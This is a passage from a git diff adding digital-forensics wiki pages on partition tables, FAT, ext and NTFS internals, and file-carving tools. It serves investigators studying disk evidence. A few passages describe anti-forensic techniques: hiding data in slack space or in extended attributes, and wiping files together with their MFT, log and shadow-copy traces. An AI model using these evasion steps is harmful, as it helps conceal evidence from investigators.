--profile=Win7SP1x86_23418 screenshot -f file.dmp +``` + +### Master Boot Record \(MBR\) + +```text +volatility --profile=Win7SP1x86_23418 mbrparser -f file.dmp +``` + +The MBR holds the information on how the logical partitions, containing [file systems](https://en.wikipedia.org/wiki/File_system), are organized on that medium. The MBR also contains executable code to function as a loader for the installed operating system—usually by passing control over to the loader's [second stage](https://en.wikipedia.org/wiki/Second-stage_boot_loader), or in conjunction with each partition's [volume boot record](https://en.wikipedia.org/wiki/Volume_boot_record) \(VBR\). This MBR code is usually referred to as a [boot loader](https://en.wikipedia.org/wiki/Boot_loader). From [here](https://en.wikipedia.org/wiki/Master_boot_record). + + + diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md new file mode 100644 index 00000000000..67191771d2b --- /dev/null +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/README.md @@ -0,0 +1,232 @@ +# Partitions/File Systems/Carving + +## Partitions + +A hard drive or a **SSD disk can contain different partitions** with the goal of separating data physically. +The **minimum** unit of a disk is the **sector** \(normally composed by 512B\). So, each partition size needs to be multiple of that size. + +### MBR \(master Boot Record\) + +It's allocated in the **first sector of the disk after the 446B of the boot code**. This sector is essential to indicate the PC what and from where a partition should be mounted. +It allows up to **4 partitions** \(at most **just 1** can be active/**bootable**\). However, if you need more partitions you can use **extended partitions**.. The **final byte** of this first sector is the boot record signature **0x55AA**. Only one partition can be marked as active. +MBR allows **max 2.2TB**. + +![](../../../.gitbook/assets/image%20%28503%29.png) + +![](../../../.gitbook/assets/image%20%28498%29.png) + +From the **bytes 440 to the 443** of the MBR you can find the **Windows Disk Signature** \(if Windows is used\). The logical drive letters of the hard disk depend on the Windows Disk Signature. Changing this signature could prevent Windows from booting \(tool: [**Active Disk Editor**](https://www.disk-editor.org/index.html)**\)**. + +![](../../../.gitbook/assets/image%20%28499%29.png) + +#### Format + +| Offset | Length | Item | +| :--- | :--- | :--- | +| 0 \(0x00\) | 446\(0x1BE\) | Boot code | +| 446 \(0x1BE\) | 16 \(0x10\) | First Partition | +| 462 \(0x1CE\) | 16 \(0x10\) | Second Partition | +| 478 \(0x1DE\) | 16 \(0x10\) | Third Partition | +| 494 \(0x1EE\) | 16 \(0x10\) | Fourth Partition | +| 510 \(0x1FE\) | 2 \(0x2\) | Signature 0x55 0xAA | + +#### Partition Record Format + +| Offset | Length | Item | +| :--- | :--- | :--- | +| 0 \(0x00\) | 1 \(0x01\) | Active flag \(0x80 = bootable\) | +| 1 \(0x01\) | 1 \(0x01\) | Start head | +| 2 \(0x02\) | 1 \(0x01\) | Start sector \(bits 0-5\); upper bits of cylinder \(6- 7\) | +| 3 \(0x03\) | 1 \(0x01\) | Start cylinder lowest 8 bits | +| 4 \(0x04\) | 1 \(0x01\) | Partition type code \(0x83 = Linux\) | +| 5 \(0x05\) | 1 \(0x01\) | End head | +| 6 \(0x06\) | 1 \(0x01\) | End sector \(bits 0-5\); upper bits of cylinder \(6- 7\) | +| 7 \(0x07\) | 1 \(0x01\) | End cylinder lowest 8 bits | +| 8 \(0x08\) | 4 \(0x04\) | Sectors preceding partition \(little endian\) | +| 12 \(0x0C\) | 4 \(0x04\) | Sectors in partition | + +In order to mount a MBR in Linux you first need to get the start offset \(you can use `fdisk` and the the `p` command\) + +![](../../../.gitbook/assets/image%20%28413%29%20%283%29%20%283%29%20%283%29%20%282%29%20%281%29.png) + +An then use the following code + +```bash +#Mount MBR in Linux +mount -o ro,loop,offset= +#63x512 = 32256Bytes +mount -o ro,loop,offset=32256,noatime /path/to/image.dd /media/part/ +``` + +#### LBA \(Logical block addressing\) + +**Logical block addressing** \(**LBA**\) is a common scheme used for **specifying the location of blocks** of data stored on computer storage devices, generally secondary storage systems such as hard disk drives. LBA is a particularly simple linear addressing scheme; **blocks are located by an integer index**, with the first block being LBA 0, the second LBA 1, and so on. + +### GPT \(GUID Partition Table\) + +It’s called GUID Partition Table because every partition on your drive has a **globally unique identifier**. + +Just like MBR it starts in the **sector 0**. The MBR occupies 32bits while **GPT** uses **64bits**. +GPT **allows up to 128 partitions** in Windows and up to **9.4ZB**. +Also, partitions can have a 36 character Unicode name. + +On an MBR disk, the partitioning and boot data is stored in one place. If this data is overwritten or corrupted, you’re in trouble. In contrast, **GPT stores multiple copies of this data across the disk**, so it’s much more robust and can recover if the data is corrupted. + +GPT also stores **cyclic redundancy check \(CRC\)** values to check that its data is intact. If the data is corrupted, GPT can notice the problem and **attempt to recover the damaged data** from another location on the disk. + +#### Protective MBR \(LBA0\) + +For limited backward compatibility, the space of the legacy MBR is still reserved in the GPT specification, but it is now used in a **way that prevents MBR-based disk utilities from misrecognizing and possibly overwriting GPT disks**. This is referred to as a protective MBR. + +![](../../../.gitbook/assets/image%20%28504%29.png) + +#### Hybrid MBR \(LBA 0 + GPT\) + +In operating systems that support **GPT-based boot through BIOS** services rather than EFI, the first sector may also still be used to store the first stage of the **bootloader** code, but **modified** to recognize **GPT** **partitions**. The bootloader in the MBR must not assume a sector size of 512 bytes. + +#### Partition table header \(LBA 1\) + +The partition table header defines the usable blocks on the disk. It also defines the number and size of the partition entries that make up the partition table \(offsets 80 and 84 in the table\). + +| Offset | Length | Contents | +| :--- | :--- | :--- | +| 0 \(0x00\) | 8 bytes | Signature \("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines\) | +| 8 \(0x08\) | 4 bytes | Revision 1.0 \(00h 00h 01h 00h\) for UEFI 2.8 | +| 12 \(0x0C\) | 4 bytes | Header size in little endian \(in bytes, usually 5Ch 00h 00h 00h or 92 bytes\) | +| 16 \(0x10\) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header \(offset +0 up to header size\) in little endian, with this field zeroed during calculation | +| 20 \(0x14\) | 4 bytes | Reserved; must be zero | +| 24 \(0x18\) | 8 bytes | Current LBA \(location of this header copy\) | +| 32 \(0x20\) | 8 bytes | Backup LBA \(location of the other header copy\) | +| 40 \(0x28\) | 8 bytes | First usable LBA for partitions \(primary partition table last LBA + 1\) | +| 48 \(0x30\) | 8 bytes | Last usable LBA \(secondary partition table first LBA − 1\) | +| 56 \(0x38\) | 16 bytes | Disk GUID in mixed endian | +| 72 \(0x48\) | 8 bytes | Starting LBA of array of partition entries \(always 2 in primary copy\) | +| 80 \(0x50\) | 4 bytes | Number of partition entries in array | +| 84 \(0x54\) | 4 bytes | Size of a single partition entry \(usually 80h or 128\) | +| 88 \(0x58\) | 4 bytes | CRC32 of partition entries array in little endian | +| 92 \(0x5C\) | \* | Reserved; must be zeroes for the rest of the block \(420 bytes for a sector size of 512 bytes; but can be more with larger sector sizes\) | + +#### Partition entries \(LBA 2–33\) + +| GUID partition entry format | | | +| :--- | :--- | :--- | +| Offset | Length | Contents | +| 0 \(0x00\) | 16 bytes | [Partition type GUID](https://en.wikipedia.org/wiki/GUID_Partition_Table#Partition_type_GUIDs) \(mixed endian\) | +| 16 \(0x10\) | 16 bytes | Unique partition GUID \(mixed endian\) | +| 32 \(0x20\) | 8 bytes | First LBA \([little endian](https://en.wikipedia.org/wiki/Little_endian)\) | +| 40 \(0x28\) | 8 bytes | Last LBA \(inclusive, usually odd\) | +| 48 \(0x30\) | 8 bytes | Attribute flags \(e.g. bit 60 denotes read-only\) | +| 56 \(0x38\) | 72 bytes | Partition name \(36 [UTF-16](https://en.wikipedia.org/wiki/UTF-16)LE code units\) | + +#### Partitions Types + +![](../../../.gitbook/assets/image%20%28500%29.png) + +More partition types in [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) + +### Inspecting + +After mounting the forensics image with [**ArsenalImageMounter**](https://arsenalrecon.com/downloads/), you can inspect the first sector using the Windows tool [**Active Disk Editor**](https://www.disk-editor.org/index.html)**.** In the following image a **MBR** was detected on the **sector 0** and interpreted: + +![](../../../.gitbook/assets/image%20%28501%29.png) + +If it was a **GPT table instead of a MBR** it should appear the signature _EFI PART_ in the **sector 1** \(which in the previous image is empty\). + +## File-Systems + +### Windows file-systems list + +* **FAT12/16**: MSDOS, WIN95/98/NT/200 +* **FAT32**: 95/2000/XP/2003/VISTA/7/8/10 +* **ExFAT**: 2008/2012/2016/VISTA/7/8/10 +* **NTFS**: XP/2003/2008/2012/VISTA/7/8/10 +* **ReFS**: 2012/2016 + +### FAT + +The **FAT \(File Allocation Table\)** file system is named for its method of organization, the file allocation table, which resides at the beginning of the volume. To protect the volume, **two copies** of the table are kept, in case one becomes damaged. In addition, the file allocation tables and the root folder must be stored in a **fixed location** so that the files needed to start the system can be correctly located. + +![](../../../.gitbook/assets/image%20%28502%29.png) + +The minimum space unit used by this file-system is a **cluster, typically 512B** \(which is composed by a number of sectors\). + +The earlier **FAT12** had a **cluster addresses to 12-bit** values with up to **4078** **clusters**; it allowed up to 4084 clusters with UNIX. The more efficient **FAT16** increased to **16-bit** cluster address allowing up to **65,517 clusters** per volume. FAT32 uses 32-bit cluster address allowing up to **268,435,456 clusters** per volume + +The **maximum file-size allowed by FAT is 4GB** \(minus one byte\) because the file system uses a 32-bit field to store the file size in bytes, and 2^32 bytes = 4 GiB. This happens for FAT12, FAT16 and FAT32. + +The **root directory** occupies a **specific position** for both FAT12 and FAT16 \(in FAT32 it occupies a position like any other folder\). Each file/folder entry contains this information: + +* Name of the file/folder \(8 chars max\) +* Attributes +* Date of creation +* Date of modification +* Date of last access +* Address of the FAT table where the first cluster of the file starts +* Size + +When a file is "deleted" using a FAT file system, the directory entry remains almost **unchanged** except for the **first character of the file name** \(modified to ****0xE5\), preserving most of the "deleted" file's name, along with its time stamp, file length and — most importantly — its physical location on the disk. The list of disk clusters occupied by the file will, however, be erased from the File Allocation Table, marking those sectors available for use by other files created or modified thereafter. In case of FAT32, it is additionally erased field responsible for upper 16 bits of file start cluster value. + +### **NTFS** + +{% page-ref page="ntfs.md" %} + +### EXT + +**Ext2** is the most common file-system for **not journaling** partitions \(**partitions that don't change much**\) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. + +{% page-ref page="ext.md" %} + +## **Metadata** + +Some files contains metadata. This is information about the content of the file which sometimes might be interesting for the analyst as depending on the file-type it might have information like: + +* Title +* MS Office Version used +* Author +* Dates of creation and last modification +* Model of the camera +* GPS coordinates +* Image information + +You can use tools like [**exiftool**](https://exiftool.org/) and [**Metadiver**](https://www.easymetadata.com/metadiver-2/) to get the metadata of a file. + +## **Deleted Files Recovery** + +### Logged Deleted Files + +As it was seen before there are several places where the file is still saved after it was "deleted". This is because usually the deletion of a file from a file-system just mark it as deleted but the data isn't touched. Then, it's possible to inspect the registries of the files \(like the MFT\) and find the deleted files. + +Also, the OS usually saves a lot of information about file system changes and backups, so it's possible to try to use them to recover the file or as much information as possible. + +{% page-ref page="file-data-carving-recovery-tools.md" %} + +### **File Carving** + +**File carving** is a technique that tries to **find files in a bulk of data**. There are 3 main ways tools like this works: **Based on file types headers and footers**, based on file types **structures** and based on the **content** itself. + +Note that this technique **doesn't work to retrieve fragmented files**. If a file **isn't stored in contiguous sectors**, then this technique won't be able to find it or at least part of it. + +There are several tools that you can use for file Carving indicating them the file-types you want search for + +{% page-ref page="file-data-carving-recovery-tools.md" %} + +### Data Stream **C**arving + +Data Stream Carving is similar to File Carving but i**nstead of looking for complete files, it looks for interesting fragments** of information. +For example, instead of looking for a complete file containing logged URLs, this technique will search for URLs. + +{% page-ref page="file-data-carving-recovery-tools.md" %} + +### Secure Deletion + +Obviously, there are ways to **"securely" delete files and part of logs about them**. For example, it's possible to **overwrite the content** of a file with junk data several times, and then **remove** the **logs** from the **$MFT** and **$LOGFILE** about the file, and **remove the Volume Shadow Copies**. +You may notice that even performing that action there might be **other parts where the existence of the file is still logged**, and that's true and part of the forensics professional job is to find them. + +## References + +* [https://en.wikipedia.org/wiki/GUID\_Partition\_Table](https://en.wikipedia.org/wiki/GUID_Partition_Table) +* [http://ntfs.com/ntfs-permissions.htm](http://ntfs.com/ntfs-permissions.htm) +* [https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html](https://www.osforensics.com/faqs-and-tutorials/how-to-scan-ntfs-i30-entries-deleted-files.html) +* [https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service](https://docs.microsoft.com/en-us/windows-server/storage/file-server/volume-shadow-copy-service) +* **iHackLabs Certified Digital Forensics Windows** + diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md new file mode 100644 index 00000000000..4833434b96d --- /dev/null +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ext.md @@ -0,0 +1,321 @@ +# EXT + +## Ext - Extended Filesystem + +**Ext2** is the most common filesystem for **not journaling** partitions \(**partitions that don't change much**\) like the boot partition. **Ext3/4** are **journaling** and are used usually for the **rest partitions**. + +All block groups in the filesystem have the same size and are stored sequentially. This allows the kernel to easily derive the location of a block group in a disk from its integer index. + +Every block group contains the following pieces of information: + +* A copy of the filesystem’s superblock +* A copy of the block group descriptors +* A data block bitmap which is used to identify the free blocks inside the group +* An inode bitmap, which is used to identify the free inodes inside the group +* inode table: it consists of a series of consecutive blocks, each of which contains a predefined Figure 1 Ext2 inode number of inodes. All inodes have the same size: 128 bytes. A 1,024 byte block contains 8 inodes, while a 4,096-byte block contains 32 inodes. Note that in Ext2, there is no need to store on disk a mapping between an inode number and the corresponding block number because the latter value can be derived from the block group number and the relative position inside the inode table. For example, suppose that each block group contains 4,096 inodes and that we want to know the address on disk of inode 13,021. In this case, the inode belongs to the third block group and its disk address is stored in the 733rd entry of the corresponding inode table. As you can see, the inode number is just a key used by the Ext2 routines to retrieve the proper inode descriptor on disk quickly +* data blocks, containing files. Any block which does not contain any meaningful information, it is said to be free. + +![](../../../.gitbook/assets/image%20%28418%29.png) + +### Ext Optional Features + +**Features affect where** the data is located, **how** the data is stored in inodes and some of them might supply **additional metadata** for analysis, therefore features are important in Ext. + +Ext has optional features that your OS may or may not support, there are 3 possibilities: + +* Compatible +* Incompatible +* Compatible Read Only: It can be mounted but not for writing + +If there are **incompatible** features you won't be able to mount the filesystem as the OS won't know how the access the data. + +{% hint style="info" %} +Suspected attacker might have non-standard extensions +{% endhint %} + +**Any utility** that reads the **superblock** will be able to indicate the **features** of a **Ext filesystem**, but you could also use `file -sL /dev/sd*` + +### Superblock + +The superblock is the first 1024 bytes from the start, it's repeated in the first block of each group and contains: + +* Block size +* Total blocks +* Blocks per block group +* Reserved blocks before the first block group +* Total inodes +* Inodes per block group +* Volume name +* Last write time +* Last mount time +* Path where the file system was last mounted +* Filesystem status \(clean?\) + +It's possible to obtain this information from an Ext filesystem file using: + +```bash +fsstat -o /pat/to/filesystem-file.ext +#You can get the with the "p" command inside fdisk +``` + +You can also use the free gui application: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html) +Or you can also use **python** to obtain the superblock information: [https://pypi.org/project/superblock/](https://pypi.org/project/superblock/) + +### inodes + +The **inodes** contain the list of **blocks** that **contains** the actual **data** of a **file**. +If the file is big, and inode **may contain pointers** to **other inodes** that points to the blocks/more inodes containing the file data. + +![](../../../.gitbook/assets/image%20%28423%29.png) + +In **Ext2** and **Ext3** inodes are of size **128B**, **Ext4** currently uses **156B** but allocates **256B** on disk to allow a future expansion. + +Inode structure: + +| Offset | Size | Name | DescriptionF | +| :--- | :--- | :--- | :--- | +| 0x0 | 2 | File Mode | File mode and type | +| 0x2 | 2 | UID | Lower 16 bits of owner ID | +| 0x4 | 4 | Size Il | Lower 32 bits of file size | +| 0x8 | 4 | Atime | Access time in seconds since epoch | +| 0xC | 4 | Ctime | Change time in seconds since epoch | +| 0x10 | 4 | Mtime | Modify time in seconds since epoch | +| 0x14 | 4 | Dtime | Delete time in seconds since epoch | +| 0x18 | 2 | GID | Lower 16 bits of group ID | +| 0x1A | 2 | Hlink count | Hard link count | +| 0xC | 4 | Blocks Io | Lower 32 bits of block count | +| 0x20 | 4 | Flags | Flags | +| 0x24 | 4 | Union osd1 | Linux: I version | +| 0x28 | 69 | Block\[15\] | 15 pointes to data block | +| 0x64 | 4 | Version | File version for NFS | +| 0x68 | 4 | File ACL low | Lower 32 bits of extended attributes \(ACL, etc\) | +| 0x6C | 4 | File size hi | Upper 32 bits of file size \(ext4 only\) | +| 0x70 | 4 | Obsolete fragment | An obsoleted fragment address | +| 0x74 | 12 | Osd 2 | Second operating system dependent union | +| 0x74 | 2 | Blocks hi | Upper 16 bits of block count | +| 0x76 | 2 | File ACL hi | Upper 16 bits of extended attributes \(ACL, etc.\) | +| 0x78 | 2 | UID hi | Upper 16 bits of owner ID | +| 0x7A | 2 | GID hi | Upper 16 bits of group ID | +| 0x7C | 2 | Checksum Io | Lower 16 bits of inode checksum | + +"Modify" is the timestamp of the last time the file's _content_ has been mofified. This is often called "_mtime_". +"Change" is the timestamp of the last time the file's _inode_ has been changed, like by changing permissions, ownership, file name, number of hard links. It's often called "_ctime_". + +Inode structure extended \(Ext4\): + +| Offset | Size | Name | Description | +| :--- | :--- | :--- | :--- | +| 0x80 | 2 | Extra size | How many bytes beyond standard 128 are used | +| 0x82 | 2 | Checksum hi | Upper 16 bits of inode checksum | +| 0x84 | 4 | Ctime extra | Change time extra bits | +| 0x88 | 4 | Mtime extra | Modify time extra bits | +| 0x8C | 4 | Atime extra | Access time extra bits | +| 0x90 | 4 | Crtime | File create time \(seconds since epoch\) | +| 0x94 | 4 | Crtime extra | File create time extra bits | +| 0x98 | 4 | Version hi | Upper 32 bits of version | +| 0x9C | | Unused | Reserved space for future expansions | + +Special inodes: + +| Inode | Special Purpose | +| :--- | :--- | +| 0 | No such inode, numberings starts at 1 | +| 1 | Defective block list | +| 2 | Root directory | +| 3 | User quotas | +| 4 | Group quotas | +| 5 | Boot loader | +| 6 | Undelete directory | +| 7 | Reserved group descriptors \(for resizing filesystem\) | +| 8 | Journal | +| 9 | Exclude inode \(for snapshots\) | +| 10 | Replica inode | +| 11 | First non-reserved inode \(often lost + found\) | + +{% hint style="info" %} +Not that the creation time only appears in Ext4. +{% endhint %} + +Knowing the inode number you can easily find it's index: + +* **Block group** where an inode belongs: \(Inode number - 1\) / \(Inodes per group\) +* **Index inside it's group**: \(Inode number - 1\) mod\(Inodes/groups\) +* **Offset** into **inode table**: Inode number \* \(Inode size\) +* The "-1" is because the inode 0 is undefined \(not used\) + +```bash +ls -ali /bin | sort -n #Get all inode numbers and sort by them +stat /bin/ls #Get the inode information of a file +istat -o /path/to/image.ext 657103 #Get information of that inode inside the given ext file +icat -o /path/to/image.ext 657103 #Cat the file +``` + +File Mode + +| Number | Description | +| :--- | :--- | +| **15** | **Reg/Slink-13/Socket-14** | +| **14** | **Directory/Block Bit 13** | +| **13** | **Char Device/Block Bit 14** | +| **12** | **FIFO** | +| 11 | Set UID | +| 10 | Set GID | +| 9 | Sticky Bit \(without it, anyone with Write & exec perms on a directory can delete and rename files\) | +| 8 | Owner Read | +| 7 | Owner Write | +| 6 | Owner Exec | +| 5 | Group Read | +| 4 | Group Write | +| 3 | Group Exec | +| 2 | Others Read | +| 1 | Others Write | +| 0 | Others Exec | + +The bold bits \(12, 13, 14, 15\) indicate the type of file the file is \(a directory, socket...\) only one of the options in bold may exit. + +Directories + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OffsetSizeNameDescription
0x04Inode
0x42Rec lenRecord length
0x61Name lenName length
0x71File type +

0x00 Unknown +
0x01 Regular

+

0x02 Director

+

0x03 Char device

+

0x04 Block device

+

0x05 FIFO

+

0x06 Socket

+

0x07 Sym link

+
0x8NameName string (up to 255 characters)
+ +**In order to increase the performance, Root hash Directory blocks may be used.** + +**Extended Attributes** + +Can be stored in + +* Extra space between inodes \(256 - inode size, usually = 100\) +* A data block pointed to by file\_acl in inode + +Can be used to store anything as a users attribute if name starts with "user". + +Data can ne hidden this way. + +Extended Attributes Entries + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
OffsetSizeNameDescription
0x01Name lenLength of attribute name
0x11Name index +

0x0 = no prefix

+

0x1 = user. Prefix

+

0x2 = system.posix_acl_access

+

0x3 = system.posix_acl_default

+

0x4 = trusted.

+

0x6 = security.

+

0x7 = system.

+

0x8 = system.richacl

+
0x22Value offsOffset from first inode entry or start of block
0x44Value blocksDisk block where value stored or zero for this block
0x84Value sizeLength of value
0xC4HashHash for attribs in block or zero if in inode
0x10NameAttribute name w/o trailing NULL
+ +```bash +setfattr -n 'user.secret' -v 'This is a secret' file.txt #Save a secret using extended attributes +getfattr file.txt #Get extended attribute names of a file +getdattr -n 'user.secret' file.txt #Get extended attribute called "user.secret" +``` + +### Filesystem View + +In order to see the contents of the file system you can **use the free tool**: [https://www.disk-editor.org/index.html](https://www.disk-editor.org/index.html) +Or you can mount it in your linux using `mount` command. + +[https://piazza.com/class\_profile/get\_resource/il71xfllx3l16f/inz4wsb2m0w2oz\#:~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.](https://piazza.com/class_profile/get_resource/il71xfllx3l16f/inz4wsb2m0w2oz#:~:text=The%20Ext2%20file%20system%20divides,lower%20average%20disk%20seek%20time.) + diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md new file mode 100644 index 00000000000..fd145dd8171 --- /dev/null +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-recovery-tools.md @@ -0,0 +1,75 @@ +# File/Data Carving & Recovery Tools + +## Carving & Recovery tools + +More tools in [https://github.com/Claudio-C/awesome-datarecovery](https://github.com/Claudio-C/awesome-datarecovery) + +### Autopsy + +The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files. + +### Binwalk + +**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data. +It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github. +**Useful commands**: + +```bash +sudo apt install binwalk #Insllation +binwalk file #Displays the embedded data in the given file +binwalk -e file #Displays and extracts some files from the given file +binwalk --dd ".*" file #Displays and extracts all files from the given file +``` + +### Foremost + +Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types. + +```bash +sudo apt-get install foremost +foremost -v -i file.img -o output +#Discovered files will appear inside the folder "output" +``` + +### **Scalpel** + +**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract. + +```bash +sudo apt-get install scalpel +scalpel file.img -o output +``` + +### Bulk Extractor + +This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) + +This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do: + +```text +bulk_extractor memory.img -o out_folder +``` + +Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). + +### PhotoRec + +You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) + +It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for. + +![](../../../.gitbook/assets/image%20%28524%29.png) + +## Specific Data Carving Tools + +### FindAES + +Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. + +Download [here](https://sourceforge.net/projects/findaes/). + +## Complementary tools + +You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal. +You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. + diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md new file mode 100644 index 00000000000..0f5778b67ba --- /dev/null +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/file-data-carving-tools.md @@ -0,0 +1,73 @@ +# File/Data Carving Tools + +## Carving tools + +### Autopsy + +The most common tool used in forensics to extract files from images is [**Autopsy**](https://www.autopsy.com/download/). Download it, install it and make it ingest the file to find "hidden" files. Note that Autopsy is built to support disk images and other kind of images, but not simple files. + +### Binwalk + +**Binwalk** is a tool for searching binary files like images and audio files for embedded files and data. +It can be installed with `apt` however the [source](https://github.com/ReFirmLabs/binwalk) can be found on github. +**Useful commands**: + +```bash +sudo apt install binwalk #Insllation +binwalk file #Displays the embedded data in the given file +binwalk -e file #Displays and extracts some files from the given file +binwalk --dd ".*" file #Displays and extracts all files from the given file +``` + +### Foremost + +Another common tool to find hidden files is **foremost**. You can find the configuration file of foremost in `/etc/foremost.conf`. If you just want to search for some specific files uncomment them. If you don't uncomment anything foremost will search for it's default configured file types. + +```bash +sudo apt-get install foremost +foremost -v -i file.img -o output +#Discovered files will appear inside the folder "output" +``` + +### **Scalpel** + +**Scalpel** is another tool that can be use to find and extract **files embedded in a file**. In this case you will need to uncomment from the configuration file \(_/etc/scalpel/scalpel.conf_\) the file types you want it to extract. + +```bash +sudo apt-get install scalpel +scalpel file.img -o output +``` + +### Bulk Extractor + +This tool comes inside kali but you can find it here: [https://github.com/simsong/bulk\_extractor](https://github.com/simsong/bulk_extractor) + +This tool can scan an image and will **extract pcaps** inside it, **network information\(URLs, domains, IPs, MACs, mails\)** and more **files**. You only have to do: + +```text +bulk_extractor memory.img -o out_folder +``` + +Navigate through **all the information** that the tool has gathered \(passwords?\), **analyse** the **packets** \(read[ **Pcaps analysis**](../pcap-inspection/)\), search for **weird domains** \(domains related to **malware** or **non-existent**\). + +### PhotoRec + +You can find it in [https://www.cgsecurity.org/wiki/TestDisk\_Download](https://www.cgsecurity.org/wiki/TestDisk_Download) + +It comes with GUI and CLI version. You can select the **file-types** you want PhotoRec to search for. + +![](../../../.gitbook/assets/image%20%28524%29.png) + +## Specific Data Carving Tools + +### FindAES + +Searches for AES keys by searching for their key schedules. Able to find 128. 192, and 256 bit keys, such as those used by TrueCrypt and BitLocker. + +Download [here](https://sourceforge.net/projects/findaes/). + +## Complementary tools + +You can use [**viu** ](https://github.com/atanunq/viu)to see images form the terminal. +You can use the linux command line tool **pdftotext** to transform a pdf into text and read it. + diff --git a/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md new file mode 100644 index 00000000000..f6963ea8fca --- /dev/null +++ b/forensics/basic-forensic-methodology/partitions-file-systems-carving/ntfs.md @@ -0,0 +1,221 @@ +# NTFS + +## **NTFS** + +**NTFS** \(**New Technology File System**\) is a proprietary journaling file system developed by Microsoft. + +The cluster is the minimum size unit of NTFS and the size of the cluster depends on the size of a partition. + +| Partition size | Sectors per cluster | Cluster size | +| :--- | :--- | :--- | +| 512MB or less | 1 | 512 bytes | +| 513MB-1024MB \(1GB\) | 2 | 1KB | +| 1025MB-2048MB \(2GB\) | 4 | 2KB | +| 2049MB-4096MB \(4GB\) | 8 | 4KB | +| 4097MB-8192MB \(8GB\) | 16 | 8KB | +| 8193MB-16,384MB \(16GB\) | 32 | 16KB | +| 16,385MB-32,768MB \(32GB\) | 64 | 32KB | +| Greater than 32,768MB | 128 | 64KB | + +### **Slack-Space** + +As the **minimum** size unit of NTFS is a **cluster**. Each file will be occupying a number of complete clusters. Then, it's highly probable that **each file occupies more space than necessary**. These **unused** **spaces** **booked** by a file which is called **slacking** **space**. And people could take advantage of this technique to **hide** **information**. + +![](../../../.gitbook/assets/image%20%28464%29.png) + +### **NTFS boot sector** + +When you format an NTFS volume, the format program allocates the first 16 sectors for the $Boot metadata file. First sector, in fact, is a boot sector with a "bootstrap" code and the following 15 sectors are the boot sector's IPL \(initial program loader\). To increase file system reliability the very last sector an NTFS partition contains a spare copy of the boot sector. + +### **Master File Table o $MFT** + +The NTFS file system contains a file called the _master file table_, or MFT. There is at least **one entry in the MFT for every file on an NTFS file system** volume, including the MFT itself. All information about a file, including its **size, time and date stamps, permissions, and data content**, is stored either in MFT entries, or in space outside the MFT that is described by MFT entries. + +As **files are added** to an NTFS file system volume, more entries are added to the MFT and the **MFT increases in size**. When **files** are **deleted** from an NTFS file system volume, their **MFT entries are marked as free** and may be reused. However, disk space that has been allocated for these entries is not reallocated, and the size of the MFT does not decrease. + +The NTFS file system **reserves space for the MFT to keep the MFT as contiguous as possible** as it grows. The space reserved by the NTFS file system for the MFT in each volume is called the **MFT zone**. Space for file and directories are also allocated from this space, but only after all of the volume space outside of the MFT zone has been allocated. + +Depending on the average file size and other variables, **either the reserved MFT zone or the unreserved space on the disk may be allocated first as the disk fills to capacity**. Volumes with a small number of relatively large files will allocate the unreserved space first, while volumes with a large number of relatively small files allocate the MFT zone first. In either case, fragmentation of the MFT starts to take place when one region or the other becomes fully allocated. If the unreserved space is completely allocated, space for user files and directories will be allocated from the MFT zone. If the MFT zone is completely allocated, space for new MFT entries will be allocated from the unreserved space. + +NTFS file systems also generate a **$MFTMirror**. This is a **copy** of the **first 4 entries** of the MFT: $MFT, $MFT Mirror, $Log, $Volume. + +NTFS reserves the first 16 records of the table for special information: + +| System File | File Name | MFT Record | Purpose of the File | +| :--- | :--- | :--- | :--- | +| Master file table | $Mft | 